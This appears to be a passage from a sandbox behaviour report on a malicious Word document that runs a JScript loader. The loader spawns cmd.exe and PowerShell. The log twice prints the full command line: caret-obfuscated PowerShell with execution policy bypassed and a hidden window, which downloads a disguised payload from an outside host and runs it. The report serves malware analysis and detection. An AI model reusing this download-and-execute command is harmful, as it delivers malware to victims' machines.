Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe show_window = 3191024 True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff410000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff41d7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 3562080 True 1
Fn
System (73)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:51 (UTC) True 2
Fn
Get Time type = Ticks, time = 118779 True 1
Fn
Get Time type = Performance Ctr, time = 17153810044 True 1
Fn
Get Time type = Ticks, time = 119621 True 1
Fn
Get Time type = Performance Ctr, time = 17240041764 True 1
Fn
Get Time type = Ticks, time = 119637 True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:52 (UTC) True 3
Fn
Get Time type = Ticks, time = 119808 True 1
Fn
Get Time type = Performance Ctr, time = 17261318956 True 1
Fn
Get Time type = Ticks, time = 119839 True 1
Fn
Get Time type = Performance Ctr, time = 17263553347 True 1
Fn
Get Time type = Ticks, time = 119964 True 1
Fn
Get Time type = Ticks, time = 119980 True 5
Fn
Get Time type = Ticks, time = 119995 True 9
Fn
Get Time type = Ticks, time = 120042 True 9
Fn
Get Time type = Ticks, time = 120058 True 5
Fn
Get Time type = Ticks, time = 120073 True 4
Fn
Get Time type = Ticks, time = 120089 True 2
Fn
Get Time type = Ticks, time = 120105 True 4
Fn
Get Time type = Ticks, time = 120120 True 1
Fn
Get Time type = Ticks, time = 120136 True 1
Fn
Get Time type = Ticks, time = 120401 True 1
Fn
Get Time type = Performance Ctr, time = 17357663375 True 1
Fn
Get Time type = Ticks, time = 120417 True 1
Fn
Get Time type = Ticks, time = 120432 True 2
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = Ι0 True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #4: cmd.exe
62 0
»
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:35
OS Process Information
»
Information Value
PID 0x83c
Parent PID 0xba4 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 844
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x31c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:45:54 (UTC) True 1
Fn
Get Time type = Ticks, time = 122039 True 1
Fn
Get Time type = Performance Ctr, time = 17544329216 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #5: cmd.exe
62 0
»
Information Value
ID #5
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:35
OS Process Information
»
Information Value
PID 0x848
Parent PID 0xb58 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 46C
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x8b8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:45:54 (UTC) True 1
Fn
Get Time type = Ticks, time = 121992 True 1
Fn
Get Time type = Performance Ctr, time = 17540425613 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #6: wscript.exe
184 0
»
Information Value
ID #6
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:51, Reason: Child Process
Unmonitor End Time: 00:00:56, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0x41c
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8C0
0x 8F4
0x 8D4
0x 8E0
0x 154
0x 8F8
0x 908
0x 7D8
0x 81C
0x 820
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 16, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 16, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 16, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 16, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff8d0000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff8dd7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 3234400 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:54 (UTC) True 1
Fn
Get Time type = Ticks, time = 122616 True 1
Fn
Get Time type = Performance Ctr, time = 17610102718 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:45:55 (UTC) True 3
Fn
Get Time type = Ticks, time = 123271 True 1
Fn
Get Time type = Performance Ctr, time = 17675661926 True 1
Fn
Get Time type = Ticks, time = 123287 True 2
Fn
Get Time type = Ticks, time = 123599 True 1
Fn
Get Time type = Performance Ctr, time = 17707547397 True 1
Fn
Get Time type = Ticks, time = 123615 True 1
Fn
Get Time type = Performance Ctr, time = 17708583083 True 1
Fn
Get Time type = Ticks, time = 124161 True 1
Fn
Get Time type = Ticks, time = 124457 True 1
Fn
Get Time type = Ticks, time = 124473 True 1
Fn
Get Time type = Ticks, time = 124535 True 3
Fn
Get Time type = Ticks, time = 124551 True 7
Fn
Get Time type = Ticks, time = 124566 True 3
Fn
Get Time type = Ticks, time = 124582 True 1
Fn
Get Time type = Ticks, time = 124597 True 2
Fn
Get Time type = Ticks, time = 124613 True 6
Fn
